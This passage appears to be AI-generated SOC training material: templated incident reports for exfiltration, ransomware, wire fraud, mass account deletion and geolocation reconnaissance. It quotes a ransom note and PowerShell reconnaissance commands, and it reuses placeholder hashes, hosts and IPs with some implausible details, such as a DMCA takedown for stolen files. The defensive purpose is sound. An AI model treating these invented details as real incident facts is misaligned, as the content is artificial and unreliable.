Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to data theft.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
DNS allowed to external resolvers (8.8.8.8).
6. Business Impact:
Operational Impact: Engineering host offline for 2 hours.
Data Exposure: 210 KB of sensitive data exfiltrated (financial, customer, source code).
7. Remediation & Prevention:
Completed Actions:
Exfiltration stopped.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Restricted DNS to corporate resolvers only.
Enhanced monitoring for DNS tunneling.
8. Conclusion:
An attacker used DNS tunneling to exfiltrate 210 KB of sensitive data, evading detection by using a non-standard protocol. ExtraHop detected the anomalous DNS query pattern and enabled rapid containment, though exfiltration had already occurred.
Closure Rationale: Data exfiltrated; exfiltration stopped; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-12 17:30 EST
170. T1048.003 – Exfiltration Over Unencrypted/Non-Standard Protocol (Palo Alto Detection)
Palo Alto Alert Details
Alert ID: PAN-EXFIL-ALT-PROTO-1048-7842 Alert Time: 2024-03-12 10:30:22 EST Severity: HIGH (85/100) Source: Palo Alto Networks Firewall + WildFire Rule: “Data Exfiltration over Non-Standard Port Detected” MITRE ATT&CK: T1048.003 – Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Alert Details:
Detection: Large data transfer over TCP port 444 (not standard) to suspicious IP
User: bturner@company.com (Brian Turner, Accountant) Source: 192.168.45.112 (FIN-WS-078) Destination: 185.143.221[.]89:444 Time: 10:15-10:30 EST Protocol: Raw TCP (no application layer)
Traffic Analysis:
10:15-10:30: 4 separate TCP streams
Total data: 47 MB
Data pattern: Raw binary (not HTTP, FTP, etc.)
Payload analysis (WildFire): Contains ZIP archives of financial documents
Detection Logic:
Large data transfer on non-standard port (444)
Destination IP known malicious
No standard protocol (raw TCP) – suspicious
Pattern matches exfiltration over alternative protocol
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Palo Alto alert
Panorama Logs
Confirmed exfiltration over TCP/444
2. Process Investigation
Identify process on endpoint
CrowdStrike Falcon
Custom exfiltration tool (exfil.exe)
3. Data Analysis
Determine what was stolen
DLP, File Audit
47 MB of financial data exfiltrated
4. Immediate Action
Isolate host
CrowdStrike
FIN-WS-078 quarantined
5. C2 Blocking
Block destination IP
Palo Alto
185.143.221[.]89 blocked
6. Incident Response
Activate breach response
Legal, Management
Data breach declared
Jira Incident Report
Ticket: SOC-2024-210 Summary: T1048.003 – 47 MB Financial Data Exfiltrated over TCP/444 Status: RESOLVED Resolution: MALICIOUS – Data Breach Confirmed Priority: P1 – CRITICAL Labels: T1048, exfiltration, alternative-protocol, palo-alto, data-breach Components: Network-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Palo Alto Networks Firewall + WildFire.
Alert: “Data Exfiltration over Non-Standard Port Detected”.
User: bturner@company.com (Finance Department).
Host: FIN-WS-078.
Destination: 185.143.221[.]89:444.
Data: 47 MB exfiltrated.
Time: 2024-03-12 10:30 EST.
Technique: MITRE ATT&CK T1048.003 – Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol.
2. Technical Analysis:
Attack Chain:
09:30 – bturner account compromised via phishing
09:45 – Attacker logs into FIN-WS-078 via RDP
09:50 – Attacker collects financial documents
10:00 – Attacker runs exfil.exe (custom tool)
10:15-10:30 – Data exfiltration over TCP/444
10:30 – Palo Alto detects
Exfiltration Method:
Protocol: Raw TCP (no HTTP, FTP, etc.)
Port: 444 (non-standard, not commonly monitored)
Tool: exfil.exe (SHA256: a1b2c3d4…)
Data: 47 MB in 4 streams
Exfiltrated Data:
Q1 financial reports (12 MB)
Q2 forecasts (8 MB)
Budget spreadsheets (15 MB)
Customer payment data (10 MB)
Merger documents (2 MB)
Total: 47 MB
Attacker Infrastructure:
IP: 185.143.221[.]89
Port: 444
Location: Bulgaria
3. Investigation Findings:
Timeline:
09:30 – Account compromised
09:45 – Attacker logs in
09:50-10:00 – Data collection
10:15-10:30 – Exfiltration
10:30 – Alert
10:32 – SOC investigates
10:33 – Host isolated
10:34 – C2 blocked
Indicators of Compromise (IoCs):
Network:
– Destination: 185.143.221[.]89:444
– Protocol: Raw TCP
Files:
– C:\Windows\Temp\exfil.exe (SHA256: a1b2c3d4…)
– C:\temp\data.zip (47 MB, exfiltrated)
Account:
– bturner (compromised)
4. Containment Actions:
Immediate Actions:
Isolated FIN-WS-078.
Blocked destination IP at firewall.
Terminated exfil.exe process.
Deleted exfil.exe.
Disabled bturner account.
Reset password.
Breach Response:
Declared data breach.
Notified legal, PR, management.
Began customer notification process.
Reported to relevant authorities.
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to data theft.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Outbound traffic allowed on non-standard ports.
6. Business Impact:
Operational Impact: Finance host offline.
Data Exposure: 47 MB of financial and customer data exfiltrated.
Regulatory Impact: GDPR/CCPA breach.
Financial Impact: Significant.
7. Remediation & Prevention:
Completed Actions:
Exfiltration stopped.
Host isolated.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Blocked non-standard outbound ports.
Enhanced DLP for egress traffic.
8. Conclusion:
An attacker compromised a finance user’s account and exfiltrated 47 MB of financial data over a non-standard port (TCP/444). Palo Alto detected the anomalous traffic, but exfiltration had already occurred. A full data breach response was initiated.
Closure Rationale: Data exfiltrated; exfiltration stopped; breach response initiated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-12 11:30 EST
End of Batch 34
Ready for your next batch of prompts whenever you are.
Batch 35: Impact & Collection Incident Reports
Here are the next 5 detailed SOC incident reports.
171. T1567.002 – Exfiltration to Cloud Storage (Zscaler Detection)
Zscaler Alert Details
Alert ID: ZSCALER-CLOUD-EXFIL-1567-7842 Alert Time: 2024-03-13 09:30:15 EST Severity: CRITICAL (95/100) Source: Zscaler Internet Access (ZIA) – Cloud App Control Rule: “Sensitive Data Upload to Personal Cloud Storage” MITRE ATT&CK: T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage
Alert Details:
Detection: Large upload of sensitive files to personal Google Drive account
User: kwilson@company.com (Karen Wilson, Finance Manager) Source IP: 192.168.45.112 (FIN-WS-078) Destination: https://www.googleapis.com/upload/drive/v3/files Time: 09:15-09:30 EST
Upload Details:
09:15:22 – Authentication to Google Drive (OAuth) – personal account “finance.manager.kw@gmail.com”
09:16:45 – Upload: “Q1_Financial_Results.xlsx” (8.2 MB)
09:18:12 – Upload: “Q2_Projections.xlsx” (7.5 MB)
09:19:33 – Upload: “Customer_Payment_History.csv” (12.3 MB)
09:21:05 – Upload: “Merger_Agreement_Draft.pdf” (4.2 MB)
09:22:28 – Upload: “Executive_Bonus_Plan.xlsx” (3.1 MB)
09:23:50 – Upload: “VPN_Configs.zip” (2.8 MB)
09:25:15 – Upload: “passwords.kdbx” (1.8 MB)
Total: 7 files, 39.9 MB
Detection Logic:
Multiple sensitive files uploaded to personal Google Drive
User kwilson has corporate OneDrive, no business need for personal Google Drive
Files contain financial data, PII, confidential documents
Destination is personal account (not corporate)
Pattern matches data exfiltration to cloud storage
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Zscaler alert
Zscaler Admin Console
Confirmed upload to personal Google Drive
2. User Interview
Contact kwilson
Teams, Phone
User did NOT upload files (account compromised)
3. Google Drive Investigation
Check file access
Google Workspace Admin
Files uploaded to attacker’s personal account (finance.manager.kw@gmail.com)
4. Immediate Action
Isolate host
CrowdStrike
FIN-WS-078 quarantined
5. Account Remediation
Disable kwilson account
Azure AD, AD
Account disabled; password reset
6. Legal Action
Contact Google for takedown
Legal Team
DMCA takedown request submitted
Jira Incident Report
Ticket: SOC-2024-211 Summary: T1567.002 – 39.9 MB of Sensitive Data Exfiltrated to Personal Google Drive Status: RESOLVED Resolution: MALICIOUS – Data Breach Confirmed Priority: P1 – CRITICAL Labels: T1567, cloud-exfiltration, google-drive, zscaler, data-breach Components: Data-Security, Incident-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zscaler Internet Access (Cloud App Control).
Alert: “Sensitive Data Upload to Personal Cloud Storage”.
User: kwilson@company.com (Finance Manager).
Destination: Personal Google Drive (finance.manager.kw@gmail.com).
Data: 39.9 MB (7 files) uploaded.
Time: 2024-03-13 09:30 EST.
Technique: MITRE ATT&CK T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage.
2. Technical Analysis:
Attack Chain:
08:30 – kwilson account compromised via phishing
08:45 – Attacker logs into FIN-WS-078 via RDP
08:50 – Attacker collects sensitive files from local and network shares
09:00 – Attacker accesses personal Google Drive via Chrome
09:15-09:30 – Upload of 7 files (39.9 MB)
09:30 – Zscaler detects
Files Exfiltrated:
Q1_Financial_Results.xlsx (8.2 MB) – detailed revenue, expenses
Q2_Projections.xlsx (7.5 MB) – forecast, budget
Customer_Payment_History.csv (12.3 MB) – customer names, payment details (PII)
Merger_Agreement_Draft.pdf (4.2 MB) – confidential acquisition details
Executive_Bonus_Plan.xlsx (3.1 MB) – sensitive HR data
VPN_Configs.zip (2.8 MB) – network access details
passwords.kdbx (1.8 MB) – corporate password vault
Google Drive Account:
Email: finance.manager.kw@gmail.com
IP: 185.143.221[.]89 (attacker)
Status: Files uploaded and accessible
User Status:
Account compromised; user unaware
3. Investigation Findings:
Timeline:
08:30 – Account compromised
08:45 – Attacker logs in
08:50-09:00 – Data collection
09:15-09:30 – Upload to Google Drive
09:30 – Zscaler alert
09:32 – SOC investigates
09:33 – Host isolated
09:34 – Account disabled
Indicators of Compromise (IoCs):
Network:
– Destination: Google Drive API
– Attacker IP: 185.143.221[.]89
Files:
– 7 files, 39.9 MB exfiltrated (list attached)
Account:
– kwilson (compromised)
– finance.manager.kw@gmail.com (receiving account)
4. Containment Actions:
Immediate Actions:
Isolated FIN-WS-078 via CrowdStrike.
Blocked Google Drive uploads for compromised account.
Disabled kwilson account.
Reset password.
Breach Response:
Declared data breach.
Notified legal, PR, management.
Began customer notification process (PII exposure).
Submitted DMCA takedown request to Google.
Rotated all corporate passwords (password vault compromised).
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to data theft.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Cloud storage allowed (not restricted).
6. Business Impact:
Operational Impact: Finance host offline; password reset for all users.
Data Exposure: 39.9 MB of financial data, PII, strategic documents, passwords exfiltrated.
Regulatory Impact: GDPR/CCPA breach (customer PII).
Financial Impact: Significant (IP theft, incident response, notification, potential fines).
7. Remediation & Prevention:
Completed Actions:
Exfiltration stopped.
Host isolated.
Account secured.
Takedown request submitted.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Restricted cloud storage to corporate accounts only.
Enhanced DLP for cloud uploads.
8. Conclusion:
An attacker compromised a finance manager’s account and exfiltrated 39.9 MB of sensitive data to a personal Google Drive account. Zscaler detected the large uploads, but exfiltration had already occurred. A full data breach response was initiated, and all corporate passwords were rotated.
Closure Rationale: Data exfiltrated; exfiltration stopped; breach response initiated; all passwords rotated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-13 10:30 EST
172. T1486 – Data Encrypted for Impact (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-RANSOMWARE-1486-7842 Alert Time: 2024-03-13 14:15:33 EST Severity: CRITICAL (99/100) Source: CrowdStrike Falcon EDR Rule: “Ransomware Behavior Detected – Mass File Encryption” MITRE ATT&CK: T1486 – Data Encrypted for Impact
Alert Details:
Detection: Process encrypting multiple files and appending .encrypted extension
Host: FILESRV-02 (File Server) User: SYSTEM (via compromised admin account) Process: C:\Windows\Temp\encryptor.exe (PID: 4789) SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4 Time: 14:10-14:15 EST
File Encryption Events:
14:10-14:15: 12,847 files encrypted
File extensions changed to .encrypted
Locations affected:
\filesrv\finance*.* – 3,456 files (23 GB)
\filesrv\hr*.* – 2,891 files (15 GB)
\filesrv\r&d*.* – 4,234 files (28 GB)
\filesrv\executive*.* – 1,234 files (8 GB)
\filesrv\backups*.* – 1,032 files (4 GB)
Ransom Note:
File: README_ENCRYPTED.txt (created in each folder)
Content:
YOUR FILES ARE ENCRYPTED!
All your documents, databases and other important files have been encrypted with RSA-2048.
To recover your files, send 2 BTC to: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa
Then contact: decrypt@onionmail.org with your server ID: FILESRV-02
You have 72 hours. Do not attempt to recover files yourself, you will lose them.
Detection Logic:
Mass file encryption (12,847 files in 5 minutes)
File extension changes (.encrypted)
Ransom note dropped
Process from Temp folder
Pattern matches ransomware attack
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed ransomware encryption
2. Immediate Action
Isolate file server
CrowdStrike, Network ACLs
FILESRV-02 quarantined
3. Process Termination
Kill encryptor.exe
CrowdStrike
Process terminated
4. Account Remediation
Disable compromised admin account
Azure AD, AD
Admin account disabled; password reset
5. Backup Restoration
Restore encrypted files from off-site backups
Veeam Backup
All files restored
6. Incident Response
Activate disaster recovery
Management, Legal
Ransomware incident declared
Jira Incident Report
Ticket: SOC-2024-212 Summary: T1486 – Ransomware Encrypts 12,847 Files on File Server Status: RESOLVED Resolution: MALICIOUS – Files Encrypted, Restored from Backups Priority: P1 – CRITICAL Labels: T1486, ransomware, data-encrypted, crowdstrike, compromised-admin Components: Endpoint-Security, Backup-Recovery
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Ransomware Behavior Detected – Mass File Encryption”.
Host: FILESRV-02 (Primary File Server).
Process: C:\Windows\Temp\encryptor.exe.
Files: 12,847 files encrypted, 78 GB total.
Ransom Note: README_ENCRYPTED.txt.
Time: 2024-03-13 14:15 EST.
Technique: MITRE ATT&CK T1486 – Data Encrypted for Impact.
2. Technical Analysis:
Attack Chain:
13:30 – Domain admin account (jsmith) compromised via phishing
13:45 – Attacker logs into admin workstation via RDP
14:00 – Attacker uses PsExec to copy encryptor.exe to FILESRV-02
14:05 – encryptor.exe executed with SYSTEM privileges
14:10-14:15 – Mass encryption of files
14:15 – CrowdStrike detects
Ransomware Analysis:
Name: encryptor.exe (custom variant)
SHA256: a1b2c3d4…
Encryption: RSA-2048 (public key embedded)
Extension: .encrypted
Ransom Note: README_ENCRYPTED.txt
Bitcoin Address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa
Data Encrypted:
Finance: 3,456 files (financial records, reports)
HR: 2,891 files (employee records, payroll)
R&D: 4,234 files (source code, designs)
Executive: 1,234 files (board minutes, strategy)
Backups: 1,032 files (on-server backups)
Total: 12,847 files, 78 GB
Attacker Intent:
Financial gain via ransom
Business disruption
Data destruction if ransom not paid
3. Investigation Findings:
Timeline:
13:30 – Admin account compromised
13:45 – Attacker logs in
14:00 – Tool deployed
14:10-14:15 – Encryption
14:15 – Alert
14:17 – SOC investigates
14:18 – Host isolated
14:19 – Process terminated
14:20 – Admin account disabled
14:30 – Backup restoration begins
Indicators of Compromise (IoCs):
Files:
– C:\Windows\Temp\encryptor.exe (SHA256: a1b2c3d4…)
– README_ENCRYPTED.txt (multiple locations)
– *.encrypted files (12,847)
Network:
– Bitcoin wallet: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa
– Email: decrypt@onionmail.org
Account:
– jsmith (compromised domain admin)
4. Containment Actions:
Immediate Actions:
Isolated FILESRV-02.
Terminated encryptor.exe.
Disabled compromised admin account.
Reset password.
Blocked outbound connections from the server.
Data Recovery:
Restored all 12,847 encrypted files from off-site Veeam backups (previous night).
Verified file integrity.
File server back online at 16:30.
Enterprise-wide Actions:
Scanned for other ransomware indicators (none found).
Reset all admin passwords.
Enforced MFA for all admins.
5. Root Cause Analysis:
Primary Cause: Domain admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin had access to file server.
Backups were available (off-site), preventing data loss.
6. Business Impact:
Operational Impact: File server offline for 2 hours.
Data Exposure: Data encrypted but restored; no permanent loss.
Financial Impact: No ransom paid; recovery costs.
7. Remediation & Prevention:
Completed Actions:
Ransomware stopped.
Files restored.
Admin account secured.
Technical Controls Enhanced:
Enforced MFA for all admins.
Moved admin access behind VPN only.
Implemented application control.
Enhanced backup frequency and testing.
8. Conclusion:
An attacker compromised a domain admin account and deployed ransomware on a file server, encrypting 12,847 files. CrowdStrike detected the ransomware behavior within minutes, enabling isolation and restoration from backups. No ransom was paid, and no data was permanently lost.
Closure Rationale: Files encrypted; files restored from backups; admin account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-13 15:30 EST
173. T1657 – Financial Theft (Application Logs Detection)
Application Log Alert Details
Alert ID: ERP-FRAUD-1657-7842 Alert Time: 2024-03-13 11:30:22 EST Severity: CRITICAL (99/100) Source: SAP ERP Application Logs + Splunk SIEM Rule: “Unauthorized Wire Transfer Initiated” MITRE ATT&CK: T1657 – Financial Theft (custom technique)
Alert Details:
Detection: Wire transfer request from unauthorized IP with compromised credentials
Application: SAP ERP (Financial Module) User: jwilson@company.com (John Wilson, Accounts Payable Manager) Action: Initiate wire transfer Amount: $847,000.00 Recipient Account: Bank of Cyprus, Account # 1234-5678-9012-3456 Recipient Name: “Cyprus Consulting Ltd” Time: 11:25 EST Source IP: 185.143.221[.]89 (Bulgaria)
Anomaly Detection:
User jwilson normally initiates wire transfers from US IPs only
This is the first wire transfer from Bulgaria
Amount is unusually high for this user (normal average: $25,000)
Recipient account not in approved vendor list
Transfer bypassed dual approval (normally requires two approvers)
Application Logs:
11:20:15 – Login to SAP from 185.143.221[.]89 (success)
11:21:30 – Navigated to “Payment Run” transaction
11:22:45 – Created new vendor “Cyprus Consulting Ltd”
11:23:30 – Entered bank account details
11:24:15 – Initiated wire transfer for $847,000
11:25:00 – System generated transfer request
11:25:30 – Splunk alert triggered (correlation rule)
Additional Context:
User jwilson reported a suspicious email at 10:00 but did not click link? (investigating)
MFA on SAP account? Not enabled (now enforced)
Dual approval was bypassed due to “emergency override” feature (abused)
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Splunk alert
Splunk ES, SAP Logs
Confirmed unauthorized wire transfer
2. User Contact
Call jwilson immediately
Phone
User did NOT initiate transfer (account compromised)
3. Immediate Action
Cancel wire transfer
SAP Admin, Bank Contact
Wire transfer cancelled (funds not sent)
4. Account Remediation
Disable jwilson account
Azure AD, AD
Account disabled; password reset
5. Vendor Removal
Delete fraudulent vendor “Cyprus Consulting Ltd”
SAP Admin
Vendor removed
6. Incident Response
Activate financial fraud response
Legal, Finance, Management
Fraud attempt documented
Jira Incident Report
Ticket: SOC-2024-213 Summary: T1657 – Financial Theft Attempt: $847,000 Wire Transfer Status: RESOLVED Resolution: MALICIOUS – Fraud Attempt Prevented Priority: P1 – CRITICAL Labels: T1657, financial-theft, wire-fraud, sap, compromised-account Components: Financial-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: SAP ERP Application Logs + Splunk SIEM.
Alert: “Unauthorized Wire Transfer Initiated”.
User: jwilson@company.com (Accounts Payable Manager).
Action: $847,000 wire transfer to fraudulent vendor.
Time: 2024-03-13 11:30 EST.
Technique: MITRE ATT&CK T1657 – Financial Theft.
2. Technical Analysis:
Attack Chain:
10:30 – jwilson account compromised via phishing (credential harvesting)
10:45 – Attacker logs into SAP from Bulgaria IP
11:00 – Attacker enumerates financial modules
11:20-11:25 – Fraudulent wire transfer creation
11:25 – Splunk alert triggers
11:26 – SOC investigates
Fraud Details:
Amount: $847,000
Recipient: Cyprus Consulting Ltd (fraudulent vendor)
Bank: Bank of Cyprus, Account # 1234-5678-9012-3456
Bypass: Attacker used “emergency override” feature (normally requires two approvers)
SAP Activity:
Created new vendor (not in approved list)
Initiated wire transfer with high amount
Overrode dual approval requirement (abused emergency procedure)
User Status:
Account compromised; user unaware
No MFA on SAP account
3. Investigation Findings:
Timeline:
10:30 – Account compromised
10:45 – Attacker logs in
11:20-11:25 – Fraudulent transfer
11:25 – Alert
11:26 – SOC investigates
11:27 – User contacted
11:28 – Wire transfer cancelled
11:29 – Account disabled
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
Account:
– jwilson (compromised)
Vendor:
– Cyprus Consulting Ltd (fraudulent)
– Bank Account: 1234-5678-9012-3456
4. Containment Actions:
Immediate Actions:
Contacted bank to cancel wire transfer (successful – funds not sent).
Disabled jwilson account.
Reset password.
Removed fraudulent vendor from SAP.
Blocked attacker IP.
Financial Security:
Reviewed all recent wire transfers (none other suspicious).
Enhanced dual approval requirements (removed emergency override).
Account Remediation:
Enforced MFA for all SAP users.
Conducted security awareness training for finance team.
5. Root Cause Analysis:
Primary Cause: User account compromised via phishing.
Contributing Factors:
No MFA on SAP account.
Emergency override feature abused.
No geofencing for SAP access.
6. Business Impact:
Financial Impact: $847,000 at risk; prevented.
Operational Impact: Finance processes delayed for review.
Reputational Impact: None (prevented).
7. Remediation & Prevention:
Completed Actions:
Fraudulent transfer cancelled.
Account secured.
Vendor removed.
Technical Controls Enhanced:
Enforced MFA for all SAP users.
Implemented geofencing (block access from high-risk countries).
Removed emergency override or added second approval for any override.
Enhanced monitoring for wire transfers over $50,000.
8. Conclusion:
An attacker compromised an accounts payable manager’s SAP account and attempted to initiate an $847,000 wire transfer to a fraudulent vendor. Splunk detected the anomalous transaction and enabled immediate cancellation. No funds were lost.
Closure Rationale: Fraud prevented; account secured; controls enhanced.
Analyst: [Your Name], SOC Analyst Date: 2024-03-13 12:30 EST
174. T1531 – Account Access Removal (Azure AD Detection)
Azure AD Alert Details
Alert ID: AAD-ACCT-REMOVAL-1531-7842 Alert Time: 2024-03-13 16:30:45 EST Severity: CRITICAL (98/100) Source: Azure AD Identity Protection + Audit Logs Rule: “Mass Account Deletion Detected” MITRE ATT&CK: T1531 – Account Access Removal
Alert Details:
Detection: Bulk deletion of user accounts in Azure AD
Time: 16:15-16:30 EST Action Performed By: bjones@company.com (Global Administrator) – compromised Source IP: 185.143.221[.]89 (Bulgaria)
Audit Events:
16:15:22 – Delete user: jsmith@company.com (IT Admin)
16:15:45 – Delete user: kwilson@company.com (Finance Manager)
16:16:12 – Delete user: alexchen@company.com (Engineer)
16:16:38 – Delete user: rpatel@company.com (Engineer)
16:17:05 – Delete user: mwilson@company.com (Sales Rep)
16:17:33 – Delete user: cjohnson@company.com (CEO)
16:18:01 – Delete user: bturner@company.com (Accountant)
… (continuing)
Total Accounts Deleted: 87 users (from all departments)
23 from Finance
18 from Engineering
15 from Marketing
12 from Sales
10 from HR
9 from Executive (including CEO, CFO, CTO)
Additional Actions:
16:20:15 – Deleted 5 guest users
16:22:30 – Removed all users from “Domain Admins” group (emptied)
16:25:45 – Changed password policies to lock all remaining users
Detection Logic:
87 accounts deleted in 15 minutes (highly anomalous)
Actions from unusual location (Bulgaria)
Performed by Global Admin bjones (who was on vacation)
Pattern matches account access removal (sabotage)
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Azure AD audit logs
Azure AD Portal
Confirmed mass account deletion
2. User Verification
Contact bjones
Phone, Teams
bjones on vacation; did NOT perform actions
3. Immediate Action
Disable compromised bjones account
Azure AD, AD
bjones account disabled
4. Account Restoration
Recover deleted accounts
Azure AD PowerShell, Recycle Bin
87 accounts restored (from recycle bin)
5. Group Restoration
Restore Domain Admins group membership
AD
Domain Admins group restored
6. Password Policy
Revert password policy changes
Azure AD
Policies restored
7. Incident Response
Activate breach response
Management, Legal
Account sabotage incident declared
Jira Incident Report
Ticket: SOC-2024-214 Summary: T1531 – Mass Account Deletion (87 Users) by Compromised Global Admin Status: RESOLVED Resolution: MALICIOUS – Accounts Restored Priority: P1 – CRITICAL Labels: T1531, account-access-removal, azure-ad, compromised-admin Components: Identity-Management, Incident-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Azure AD Identity Protection + Audit Logs.
Alert: “Mass Account Deletion Detected”.
Action: 87 user accounts deleted, Domain Admins group emptied, password policies changed.
Performed By: bjones@company.com (Global Administrator) – compromised.
Source IP: 185.143.221[.]89 (Bulgaria).
Time: 2024-03-13 16:30 EST.
Technique: MITRE ATT&CK T1531 – Account Access Removal.
2. Technical Analysis:
Attack Chain:
15:30 – bjones credentials compromised via phishing
15:45 – Attacker logs into Azure AD portal from Bulgaria IP
16:00 – Attacker enumerates users, identifies targets
16:15-16:30 – Mass account deletion
16:20 – Domain Admins group emptied
16:25 – Password policies changed (lockout)
16:30 – Azure AD alerts
Accounts Deleted (87):
Finance (23)
Engineering (18)
Marketing (15)
Sales (12)
HR (10)
Executive (9) – CEO, CFO, CTO, etc.
Group Changes:
Domain Admins group emptied (12 members removed)
Effect: No domain administrators
Password Policy Changes:
Account lockout threshold set to 1 (any failed login locks account)
Lockout duration set to 999 minutes
Attacker Intent:
Complete denial of access to organization
Chaos and disruption
Potential precursor to ransomware
Compromised Admin:
bjones (Global Admin) on leave, unaware
No MFA on account (now enforced)
3. Investigation Findings:
Timeline:
15:30 – Admin account compromised
15:45 – Attacker logs in
16:15-16:30 – Account deletion
16:30 – Alert triggers
16:32 – SOC investigates
16:33 – bjones account disabled
16:35 – Account recovery begins
16:45 – All 87 accounts restored
16:50 – Domain Admins group restored
16:55 – Password policies reverted
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
Account:
– bjones (compromised global admin)
Actions:
– 87 user accounts deleted (list attached)
– Domain Admins group emptied
– Password policy changed
4. Containment Actions:
Immediate Actions:
Disabled compromised bjones account.
Restored all 87 deleted accounts from Azure AD Recycle Bin.
Restored Domain Admins group membership.
Reverted password policy changes.
Reset bjones password.
Enforced MFA for all admins.
Blocked attacker IP.
User Communication:
Notified all affected users (accounts were deleted for 15-30 minutes).
Verified no data loss.
Account Remediation:
Reset passwords for all 87 affected users (precaution).
5. Root Cause Analysis:
Primary Cause: Global admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin account had excessive privileges.
No alerts for mass account deletion.
6. Business Impact:
Operational Impact: 87 users locked out for 15-30 minutes.
Data Exposure: None (accounts deleted, no data access).
Reputational Impact: Internal disruption.
7. Remediation & Prevention:
Completed Actions:
Accounts restored.
Admin account secured.
MFA enforced.
Technical Controls Enhanced:
Enforced MFA for all admin accounts.
Implemented Privileged Identity Management (JIT access).
Created alert for mass account deletion.
Added IP restrictions for admin portal access.
8. Conclusion:
An attacker compromised a global admin account and deleted 87 user accounts, emptied the Domain Admins group, and changed password policies to lock out remaining users. Azure AD detected the mass changes, enabling rapid restoration. All accounts were restored within 30 minutes.
Closure Rationale: Accounts restored; admin account secured; controls enhanced.
Analyst: [Your Name], SOC Analyst Date: 2024-03-13 17:30 EST
175. T1614 – System Location Discovery (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-LOC-DISCOVERY-1614-7842 Alert Time: 2024-03-13 10:30:22 EST Severity: MEDIUM (72/100) Source: CrowdStrike Falcon EDR Rule: “System Location Discovery – Geolocation API Calls” MITRE ATT&CK: T1614 – System Location Discovery
Alert Details:
Detection: Process making external API calls to determine system geolocation
Host: DEV-WS-089 (Development Workstation) User: alexchen@company.com (Alex Chen, Engineer) Time: 10:25 EST
Process Tree:
explorer.exe (PID: 2341)
powershell.exe (PID: 4789)
Command: powershell -Command “(Invoke-WebRequest -Uri ‘http://ip-api.com/json’).Content | ConvertFrom-Json | Select country, city, lat, lon”
Command: powershell -Command “(Invoke-WebRequest -Uri ‘http://api.ipify.org’).Content”
Command: powershell -Command “(Invoke-WebRequest -Uri ‘http://ipinfo.io/json’).Content”
Network Connections:
10:25:10 – GET http://ip-api.com/json (response: {“country”:”United States”,”city”:”New York”,”lat”:40.7128,”lon”:-74.0060})
10:25:15 – GET http://api.ipify.org (response: “192.0.2.123”)
10:25:20 – GET http://ipinfo.io/json (response: {“ip”:”192.0.2.123″,”country”:”US”,”city”:”New York”})
Detection Logic:
PowerShell making multiple geolocation API calls (unusual)
User alexchen has no legitimate need for this
Commands used to determine country/city
Pattern matches adversary checking if they are in target geography
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed geolocation discovery
2. Process Investigation
Identify source of commands
CrowdStrike
PowerShell script launched from suspicious macro in document
3. User Interview
Contact alexchen
Teams, Phone
User opened document from email; script ran in background
4. Immediate Action
Terminate PowerShell
CrowdStrike
Process killed
5. Email Investigation
Find source email
Proofpoint, Exchange
Email with macro-enabled document quarantined
6. Account Remediation
Reset alexchen password
Azure AD, AD
Password reset; MFA enforced
Jira Incident Report
Ticket: SOC-2024-215 Summary: T1614 – System Location Discovery via Geolocation API Status: RESOLVED Resolution: MALICIOUS – Reconnaissance Detected Priority: P3 – LOW Labels: T1614, location-discovery, reconnaissance, crowdstrike, phishing Components: Endpoint-Security, Threat-Hunting
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “System Location Discovery – Geolocation API Calls”.
Host: DEV-WS-089 (Engineering, user alexchen).
Activity: PowerShell geolocation API calls.
Time: 2024-03-13 10:30 EST.
Technique: MITRE ATT&CK T1614 – System Location Discovery.
2. Technical Analysis:
Attack Chain:
10:00 – User receives phishing email with “Document.docm”
10:05 – User opens document, enables macros
10:06 – Macro runs hidden PowerShell script
10:10 – PowerShell queries geolocation APIs
10:25 – CrowdStrike detects
Geolocation Queries:
ip-api.com: Returns country, city, lat/lon
api.ipify.org: Returns public IP
